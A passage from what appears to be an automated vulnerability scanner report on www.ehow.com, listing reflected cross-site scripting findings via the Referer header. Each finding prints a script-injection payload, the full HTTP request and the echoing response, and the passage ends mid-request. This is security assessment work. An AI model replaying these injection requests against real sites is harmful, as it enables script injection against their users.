HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:59 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32688

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>About eHow | eHow.com</title>
       <meta charset="U
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "94767</script><script>alert(1)</script>72faf05749a";

       </script>
...[SNIP]...

4.576. http://www.ehow.com/about_us/contact_us.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/about_us/contact_us.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdb2f</script><script>alert(1)</script>413feb209a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /about_us/contact_us.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=fdb2f</script><script>alert(1)</script>413feb209a8

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:59 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31984

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Contact Us | eHow.com</title>
       <meta charset="U
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "fdb2f</script><script>alert(1)</script>413feb209a8";

       </script>
...[SNIP]...

4.577. http://www.ehow.com/about_us/faq_ehow.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/about_us/faq_ehow.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd7d</script><script>alert(1)</script>84ee8a351de was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /about_us/faq_ehow.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8cd7d</script><script>alert(1)</script>84ee8a351de

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:00 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49896

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>FAQ | eHow.com</title>
       <meta charset="UTF-8" /
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "8cd7d</script><script>alert(1)</script>84ee8a351de";

       </script>
...[SNIP]...

4.578. http://www.ehow.com/about_us/link_to_us.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/about_us/link_to_us.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e8b6</script><script>alert(1)</script>e22c3df7afd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /about_us/link_to_us.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=7e8b6</script><script>alert(1)</script>e22c3df7afd

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:58 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31379

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Link to eHow | eHow.com</title>
       <meta c
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "7e8b6</script><script>alert(1)</script>e22c3df7afd";

       </script>
...[SNIP]...

4.579. http://www.ehow.com/ajax/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ajax/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3df8</script><script>alert(1)</script>1e4d372cf6c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ajax/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=e3df8</script><script>alert(1)</script>1e4d372cf6c

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:21 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60925

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Ajax - eHow.com</title>
       <meta charset="UTF-8"
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "e3df8</script><script>alert(1)</script>1e4d372cf6c";

       </script>
...[SNIP]...

4.580. http://www.ehow.com/arts-and-crafts/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/arts-and-crafts/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8239f</script><script>alert(1)</script>b9c8de16e0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /arts-and-crafts/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8239f</script><script>alert(1)</script>b9c8de16e0a

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72207

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Arts & Crafts - How To Information | eHow.com</ti
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "8239f</script><script>alert(1)</script>b9c8de16e0a";

       </script>
...[SNIP]...

4.581. http://www.ehow.com/arts-and-entertainment/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/arts-and-entertainment/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b132</script><script>alert(1)</script>3c0febc8d3d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /arts-and-entertainment/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=7b132</script><script>alert(1)</script>3c0febc8d3d

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:35 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71928

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Arts & Entertainment - How To Information | eHow.
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "7b132</script><script>alert(1)</script>3c0febc8d3d";

       </script>
...[SNIP]...

4.582. http://www.ehow.com/at-home/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/at-home/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1952</script><script>alert(1)</script>8a38f022236 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /at-home/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=e1952</script><script>alert(1)</script>8a38f022236

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49317

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
eHow Home Blog | eHow.com
</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "e1952</script><script>alert(1)</script>8a38f022236";

       </script>
...[SNIP]...

4.583. http://www.ehow.com/beauty-and-personal-care/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/beauty-and-personal-care/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3f97</script><script>alert(1)</script>8cdcd28db28 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /beauty-and-personal-care/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c3f97</script><script>alert(1)</script>8cdcd28db28

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73789

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Beauty & Personal Care - How To Information | eHo
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "c3f97</script><script>alert(1)</script>8cdcd28db28";

       </script>
...[SNIP]...

4.584. http://www.ehow.com/blog/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/blog/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da28b</script><script>alert(1)</script>c0d891d3e78 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /blog/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=da28b</script><script>alert(1)</script>c0d891d3e78

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78995

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Official eHow Blog - How To Do Just About Every
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "da28b</script><script>alert(1)</script>c0d891d3e78";

       </script>
...[SNIP]...

4.585. http://www.ehow.com/business/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/business/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc313</script><script>alert(1)</script>8cd44ec7a9c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /business/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=cc313</script><script>alert(1)</script>8cd44ec7a9c

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75446

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Business - How To Information | eHow.com</title>
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "cc313</script><script>alert(1)</script>8cd44ec7a9c";

       </script>
...[SNIP]...

4.586. http://www.ehow.com/car-repair-and-maintenance/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/car-repair-and-maintenance/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba477</script><script>alert(1)</script>69ee7d46388 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-repair-and-maintenance/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ba477</script><script>alert(1)</script>69ee7d46388

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:35 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72871

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Car Repair & Maintenance - How To Information | e
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "ba477</script><script>alert(1)</script>69ee7d46388";

       </script>
...[SNIP]...

4.587. http://www.ehow.com/careers/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/careers/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64203</script><script>alert(1)</script>24a7a2730b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /careers/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=64203</script><script>alert(1)</script>24a7a2730b1

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:37 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75713

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Careers - How To Information | eHow.com</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "64203</script><script>alert(1)</script>24a7a2730b1";

       </script>
...[SNIP]...

4.588. http://www.ehow.com/cars/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/cars/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e0af</script><script>alert(1)</script>80dc93282ee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cars/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=5e0af</script><script>alert(1)</script>80dc93282ee

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70774

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Cars - How To Information | eHow.com</title>
       <
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "5e0af</script><script>alert(1)</script>80dc93282ee";

       </script>
...[SNIP]...

4.589. http://www.ehow.com/community.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/community.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ede99</script><script>alert(1)</script>0bc15203d14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /community.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
